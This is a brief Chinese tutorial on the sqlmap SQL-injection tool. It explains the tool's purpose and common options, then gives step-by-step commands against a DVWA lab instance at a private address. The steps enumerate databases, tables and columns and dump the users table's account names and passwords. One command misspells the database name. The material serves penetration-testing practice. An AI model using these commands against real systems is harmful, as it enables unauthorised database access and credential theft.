一、 官方对与工具的解释

sqlmap是一款开源渗透测试工具，可自动检测和利用SQL注入漏洞并接管数据库服务器。它具有强大的检测引擎，针对终极渗透测试人员的众多特性，以及从数据库指纹识别，从数据库获取数据，到访问底层文件系统以及在操作系统上执行命令的各种开关，带外连接。

二、一些常用的选项

–dump 转储DBMS数据库表条目–dump-all 转储所有DBMS数据库表条目–tables 枚举DBMS数据库表–columns 枚举DBMS数据库表列–u 指定目标的URL–cookie=COOKIE HTTP Cookie标头值–level=LEVEL 要执行的测试级别（1-5，默认值1）–risk=RISK 要执行测试的风险（1-3，默认值1）–dbms=DBMS 强制指定数据库类

三、 简单的测试实例

检测注入点 sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" 列出数据库 sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" --dbs 列出指定数据库中的表 sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dvwa --tables 列出指定表中的列 sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dwwa -T users --columns dump出指定列中的数据字段，及帐号密码 sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dvwa -T users --columns --dump